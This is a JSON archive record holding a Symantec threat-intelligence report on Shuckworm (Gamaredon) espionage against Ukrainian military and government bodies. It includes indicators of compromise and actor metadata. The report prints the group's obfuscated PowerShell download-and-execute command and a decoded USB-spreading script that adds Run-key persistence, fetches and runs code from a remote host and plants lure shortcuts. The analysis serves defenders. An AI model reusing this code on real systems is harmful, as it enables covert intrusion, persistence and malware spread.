{
	"id": "db33eab7-9695-4b71-8027-5c7c0d43694e",
	"created_at": "2026-04-06T00:14:43.855359Z",
	"updated_at": "2026-04-10T03:37:04.346917Z",
	"deleted_at": null,
	"sha1_hash": "3f376504ae710b506adaf25298562f78dec63f15",
	"title": "Shuckworm: Inside Russia’s Relentless Cyber Campaign Against Ukraine",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 131937,
	"plain_text": "Shuckworm: Inside Russia’s Relentless Cyber Campaign Against\r\nUkraine\r\nBy About the Author\r\nArchived: 2026-04-05 14:22:51 UTC\r\nThe Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent\r\ntargets including security services, military, and government organizations.\r\nIn some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months.\r\nThe attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of\r\nUkrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and\r\nmore.\r\nIn a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of\r\nknown tools and short-lived infrastructure, along with new additions, such as USB propagation malware.\r\nShuckworm (aka Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its\r\noperations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group\r\noperates on behalf of the Russian Federal Security Service (FSB).\r\nShuckworm tactics, techniques, and procedures\r\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim\r\nmachines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with\r\nthe attachments of various file types, such as:\r\n.docx\r\n.rar (RAR archive files)\r\n.sfx (self-extracting archives)\r\n.lnk\r\n.hta (HTML smuggling files)\r\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of\r\nchildren, among others.\r\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted\r\nmachines.\r\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor\r\nmalware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in\r\nApril 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\r\nPage 1 of 11\n\nare Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to\r\nmaintain persistence, and download additional code from a command-and-control (C\u0026C) server.\r\nExamples of recent scheduled tasks include execution of the following command lines:\r\nCSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl\r\n/nff\r\nCSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\r\nwscript.exe \"C:\\Users\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\r\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an\r\nrtk.lnk extension. The script uses file names such as “porn_video.rtf.lnk”, “do_not_delete.rtf.lnk”” and\r\n“evidence.rtf.lnk” in an attempt to entice individuals to open the files. These file names are generally in Ukrainian,\r\nbut some are also in English.\r\nNext, the script enumerates all drives, copying itself to any available removable disks – USB drives. These USB\r\ndrives are likely used by the attackers for lateral movement across victim networks and may be used to help the\r\nattackers reach air-gapped machines within targeted organizations.\r\nIn this recent activity, we also observed the group leveraging legitimate services to act as C\u0026C servers, including\r\nusing the Telegram messaging service for its C\u0026C infrastructure. More recently, they have also used Telegram’s\r\nmicro-blogging platform, called Telegraph, to store C\u0026C addresses.\r\nFigure 1. Threat actors use Telegraph to store C\u0026C addresses\r\nFigure 1. Threat actors use Telegraph to store C\u0026C addresses\r\nShuckworm tends to only use its C\u0026C infrastructure for short periods of time, limiting the usefulness of its C\u0026Cs\r\nwhen it comes to finding more activity or linking activity together. However, the group does use SSL certificates\r\nthat have some commonalities that may be leveraged for tracking purposes. We believe the group is likely\r\nleveraging pre-configured images for use in its C\u0026C deployment. These data points can help researchers to\r\nidentify additional C\u0026C infrastructure and Shuckworm activity.\r\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed\r\nonto victim networks to steal and exfiltrate data of interest.\r\nTypical Attack Chain\r\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this\r\ncampaign.\r\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was\r\nlikely delivered via a spear-phishing email and which contained a malicious document.\r\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the\r\nnext-stage payload from the attackers’ C\u0026C server:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\r\nPage 2 of 11\n\n\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+[char](56+56)+[char](104)+\r\n[char](112);$hosta=[char](50+48);\r\n[system.net.servicepointmanager]::servercertificatevalidationcallback=\r\n{$true};$hosta+='.vafikgo.';$hosta+=[char](57+57);$hosta+=[char](60+57);$addrs=\r\n[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object\r\nnet.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"\r\nMore recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This\r\nis likely an attempt to evade some tracking methods employed by researchers.\r\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to\r\navoid detection, with up to 25 new variants of the group’s scripts observed per month between January and April\r\n2023.\r\nNext, a VBS script, which was Shuckworm’s Pterodo backdoor, was executed:\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff\r\n/cfm /sc4model\r\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this\r\nactivity appeared to contain multiple confidential documents related to Ukrainian security services or government\r\ndepartments.\r\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had\r\nbeen dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file\r\npaths present on infected machines that indicate users had plugged in an infected USB key e.g. \"usb-накопитель\"\r\ntranslates as \"usb-drive\".\r\nThe foto.safe file is a Base64-encoded script.\r\nDecoded it looks like the following:\r\nfUNCtIon sET-lnK ($chILd) {\r\n$nAMetxt = \"foto.sAfe\".TolowER();\r\n$NAmE = (\"кОМПРОМат\", \"КОРЗиНА\", \"СеКРетнО\" | GeT-rAnDOm).ToUPPeR();\r\n$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;\r\n$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");\r\n$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";\r\n$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();\r\n$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt | OUT-STrIng))\".TOlower();\r\n$sHORTCUT.ArGUMEnTs = $tExt;\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\r\nPage 3 of 11\n\n$sHortCUT.saVE();\r\n$mYfIlE= $chIlD+\"\\$naMeTXT\"\r\ncOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE\r\n$FIlE=GEt-ITEM $mYfiLE -forCe\r\n$FiLe.ATtRiButes='hiDDEN'\r\n}\r\nSet-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE\r\n$env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO\r\ninVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp | Out-sTRing) | poweRSHeLL -noPROfILE';\r\ncoPy-item  .\\\"fOtO.safe\"  -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp\r\nWHile($CoUNT -lE 2){\r\n$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru')\r\n+'/slEEP.Php';\r\niEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')\r\n$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";\r\n$Drive.naMe | FOreaCH-oBJecT{\r\n$CHiLdS = GET-ChilDITem $drivE.nAMe\r\nfoReach($cHilDs IN $chiLDs)\r\n{\r\nif( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )\r\n{\r\nsET-lnk $chILds.fUlLName\r\n}}\r\nIF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){\r\nSEt-lNK $DRivE.name\r\n}}\r\nSTArt-SLEeP -S 300;\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\r\nPage 4 of 11\n\n}\r\nThis PowerShell script is used to copy itself onto the infected machine and then create a shortcut file that links to\r\nthe PowerShell script. Symantec has identified multiple variants of this script that can be used to indicate\r\nsuccessful infection, or to download additional tools onto infected machines. \r\nVictims\r\nOne of the most significant things about this campaign is the targets, which include Ukrainian military, security,\r\nresearch, and government organizations. The attackers were observed focusing on machines that contained what\r\nappeared from file names to be sensitive military information that may be abused to support Russian kinetic war\r\nefforts.   \r\nThe majority of these attacks began in February/March 2023, with the attackers maintaining a presence on some\r\nof the victim machines until May. The sectors and nature of the organizations and machines targeted may have\r\ngiven the attackers access to significant amounts of sensitive information. There were indications in some\r\norganizations that the attackers were on the machines of the organizations’ human resources departments,\r\nindicating that information about individuals working at the various organizations was a priority for the attackers,\r\namong other things.\r\nThis activity demonstrates that Shuckworm’s relentless focus on Ukraine continues. It seems clear that Russian\r\nnation-state-backed attack groups continue to prioritize high-value Ukrainian targets in attempts to find data that\r\nmay potentially help their military operations.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nMalicious documents\r\nf7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192\r\n31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b\r\nc62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30\r\nc6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8\r\n3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137\r\n3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601\r\nacc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8\r\nUSB propagation scripts\r\n28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01\r\n2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581\r\ndbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87\r\na615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\r\nPage 5 of 11\n\n91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86\r\nExample of LNK files created\r\n7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a\r\nLNK file names\r\naccount.rtf.lnk\r\naccount_card.rtf.lnk\r\napplication.rtf.lnk\r\nbank_accоunt.rtf.lnk\r\nblank_cap.rtf.lnk\r\nbusiness trip.rtf.lnk\r\ncompromising_evidence.rtf.lnk\r\nconduct.rtf.lnk\r\ncuprovod.rtf.lnk\r\ndo_not_delete.rtf.lnk\r\ndsk.rtf.lnk\r\nencouragement.rtf.lnk\r\nform_new.rtf.lnk\r\ninstructions.rtf.lnk\r\njourney.mdb\r\nletter to.rtf.lnk\r\nlogin_password.docx.lnk\r\nlogin_password.rtf.lnk\r\nmobilization.rtf.lnk\r\nmy_documents.rtf.lnk\r\nmy_photos.rtf.lnk\r\nnot_delete.rtf.lnk\r\non_account.rtf.lnk\r\norder.rtf.lnk\r\npetition.rtf.lnk\r\nporn_video.rtf.lnk\r\npornography.rtf.lnk\r\npornophoto.rtf.lnk\r\nproceedings.rtf.lnk\r\nproject_sheet.rtf.lnk\r\nreport.docx.lnk\r\nreport.rtf.lnk\r\nreport_note.rtf.lnk\r\nrequest.rtf.lnk\r\nresolution.rtf.lnk\r\nsecret.rtf.lnk\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\r\nPage 6 of 11\n\nsecretly.rtf.lnk\r\nservice.docx.lnk\r\nservice.rtf.lnk\r\nsources.rtf.lnk\r\nsupport.rtf.lnk\r\nweapons_list.rtf.lnk\r\nRecent C\u0026C infrastructure (2023)\r\n45.76.141[.]166\r\n159.223.112[.]245\r\n140.82.56[.]186\r\n159.203.164[.]194\r\n45.32.94[.]58\r\n45.95.232[.]33\r\n139.59.109[.]100\r\n164.92.245[.]246\r\n45.32.101[.]6\r\n140.82.18[.]48\r\n216.128.140[.]45\r\n146.190.127[.]238\r\n207.148.74[.]68\r\n195.133.88[.]19\r\n146.190.60[.]230\r\n84.32.190[.]137\r\n206.189.154[.]168\r\n188.166.4[.]128\r\n104.248.54[.]250\r\n165.227.76[.]84\r\n66.42.104[.]158\r\n161.35.95[.]47\r\n149.28.125[.]56\r\n143.198.50[.]118\r\n66.42.126[.]121\r\n64.227.72[.]210\r\n81.19.140[.]147\r\n165.232.77[.]197\r\n146.190.117[.]209\r\n134.122.51[.]47\r\n143.198.152[.]232\r\n140.82.47[.]181\r\n159.223.102[.]109\r\n170.64.188[.]146\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\r\nPage 7 of 11\n\n155.138.194[.]244\r\n45.32.88[.]90\r\n89.185.84[.]32\r\n64.226.84[.]229\r\n206.189.14[.]94\r\n24.199.84[.]132\r\n45.32.41[.]115\r\n84.32.188[.]69\r\n206.189.128[.]172\r\n170.64.168[.]228\r\n161.35.238[.]148\r\n170.64.138[.]138\r\n178.128.86[.]43\r\n206.81.28[.]5\r\n178.128.231[.]180\r\n45.77.115[.]67\r\n136.244.65[.]253\r\n143.244.190[.]199\r\n159.65.176[.]121\r\n192.248.154[.]154\r\n209.97.175[.]128\r\n147.182.240[.]58\r\n146.190.212[.]239\r\n143.198.135[.]132\r\n45.76.202[.]102\r\n142.93.108[.]1\r\n46.101.127[.]147\r\n134.209.0[.]136\r\n138.68.110[.]19\r\n167.99.215[.]50\r\n161.35.232[.]118\r\n88.216.210[.]3\r\n165.227.121[.]87\r\n165.227.48[.]59\r\n108.61.211[.]250\r\n89.185.84[.]48\r\n167.172.69[.]123\r\n89.185.84[.]50\r\n206.189.0[.]134\r\n68.183.200[.]0\r\n178.128.16[.]170\r\n95.179.144[.]161\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\r\nPage 8 of 11\n\n164.92.222[.]8\r\n45.95.233[.]80\r\n78.141.239[.]24\r\n149.28.181[.]232\r\n24.199.107[.]218\r\n45.32.184[.]140\r\n167.172.20[.]159\r\n84.32.190[.]31\r\n164.92.185[.]60\r\n84.32.131[.]38\r\n137.184.178[.]46\r\n206.189.149[.]103\r\n157.245.176[.]123\r\n45.95.232[.]92\r\n45.95.232[.]29\r\n170.64.150[.]90\r\n89.185.84[.]45\r\n140.82.16[.]120\r\n84.32.185[.]136\r\n134.122.43[.]175\r\n195.133.88[.]55\r\n84.32.191[.]147\r\n78.141.238[.]136\r\n45.82.13[.]84\r\n159.65.248[.]0\r\n84.32.34[.]69\r\n170.64.146[.]194\r\n45.82.13[.]22\r\n45.82.13[.]23\r\n134.209.33[.]42\r\n199.247.8[.]115\r\n84.32.128[.]239\r\n173.199.70[.]238\r\n138.68.174[.]177\r\n178.128.213[.]177\r\n143.110.180[.]68\r\n167.172.144[.]127\r\n165.232.165[.]42\r\n45.95.232[.]51\r\n149.28.98[.]149\r\n104.156.230[.]193\r\n104.248.86[.]158        \r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\r\nPage 9 of 11\n\n134.122.51[.]47          \r\n134.209.182[.]221\r\n139.59.60[.]191          \r\n140.82.11[.]60\r\n140.82.47[.]181          \r\n140.82.50[.]37\r\n143.198.135[.]132\r\n143.198.53[.]203        \r\n147.182.250[.]33        \r\n149.28.130[.]189        \r\n149.28.181[.]232        \r\n149.28.98[.]149          \r\n155.138.194[.]244\r\n157.245.69[.]118        \r\n158.247.204[.]242\r\n159.223.102[.]109\r\n159.223.23[.]23          \r\n164.92.72[.]212          \r\n165.22.72[.]74\r\n165.227.76[.]84          \r\n165.232.120[.]169\r\n167.172.58[.]96          \r\n167.71.67[.]58\r\n170.64.136[.]186        \r\n170.64.140[.]214        \r\n170.64.156[.]98          \r\n178.128.228[.]252\r\n188.166.176[.]39        \r\n188.166.7[.]140          \r\n193.149.176[.]26        \r\n195.133.88[.]55          \r\n202.182.116[.]135\r\n202.182.98[.]100        \r\n206.189.80[.]216        \r\n207.148.72[.]173        \r\n31.129.22[.]46\r\n31.129.22[.]48\r\n31.129.22[.]50\r\n45.32.101[.]6              \r\n45.32.117[.]62\r\n45.32.158[.]96\r\n45.32.62[.]100\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\r\nPage 10 of 11\n\n45.32.88[.]90              \r\n45.82.13[.]84              \r\n45.95.232[.]33\r\n45.95.232[.]74\r\n45.95.233[.]80\r\n5.199.161[.]29\r\n64.226.84[.]229          \r\n64.227.64[.]163          \r\n66.42.104[.]158          \r\n68.183.200[.]0\r\n78.141.239[.]24          \r\n78.153.139[.]7\r\n81.19.140[.]147          \r\n84.32.131[.]47\r\n84.32.188[.]13\r\n95.179.144[.]161        \r\n95.179.245[.]185        \r\n216.128.178[.]248\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military"
	],
	"report_names": [
		"shuckworm-russia-ukraine-military"
	],
	"threat_actors": [
		{
			"id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308",
			"created_at": "2022-10-25T15:50:23.320841Z",
			"updated_at": "2026-04-10T02:00:05.356444Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Gamaredon Group",
				"IRON TILDEN",
				"Primitive Bear",
				"ACTINIUM",
				"Armageddon",
				"Shuckworm",
				"DEV-0157",
				"Aqua Blizzard"
			],
			"source_name": "MITRE:Gamaredon Group",
			"tools": [
				"QuietSieve",
				"Pteranodon",
				"Remcos",
				"PowerPunch"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d5156b55-5d7d-4fb2-836f-861d2e868147",
			"created_at": "2023-01-06T13:46:38.557326Z",
			"updated_at": "2026-04-10T02:00:03.023048Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"ACTINIUM",
				"DEV-0157",
				"Blue Otso",
				"G0047",
				"IRON TILDEN",
				"PRIMITIVE BEAR",
				"Shuckworm",
				"UAC-0010",
				"BlueAlpha",
				"Trident Ursa",
				"Winterflounder",
				"Aqua Blizzard",
				"Actinium"
			],
			"source_name": "MISPGALAXY:Gamaredon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "61940e18-8f90-4ecc-bc06-416c54bc60f9",
			"created_at": "2022-10-25T16:07:23.659529Z",
			"updated_at": "2026-04-10T02:00:04.703976Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Actinium",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Callisto",
				"DEV-0157",
				"G0047",
				"Iron Tilden",
				"Operation STEADY#URSA",
				"Primitive Bear",
				"SectorC08",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"Winterflounder"
			],
			"source_name": "ETDA:Gamaredon Group",
			"tools": [
				"Aversome infector",
				"BoneSpy",
				"DessertDown",
				"DilongTrash",
				"DinoTrain",
				"EvilGnome",
				"FRAUDROP",
				"Gamaredon",
				"GammaDrop",
				"GammaLoad",
				"GammaSteel",
				"Gussdoor",
				"ObfuBerry",
				"ObfuMerry",
				"PlainGnome",
				"PowerPunch",
				"Pteranodon",
				"Pterodo",
				"QuietSieve",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"Resetter",
				"RuRAT",
				"SUBTLE-PAWS",
				"Socmer",
				"UltraVNC"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434483,
	"ts_updated_at": 1775792224,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3f376504ae710b506adaf25298562f78dec63f15.pdf",
		"text": "https://archive.orkl.eu/3f376504ae710b506adaf25298562f78dec63f15.txt",
		"img": "https://archive.orkl.eu/3f376504ae710b506adaf25298562f78dec63f15.jpg"
	}
}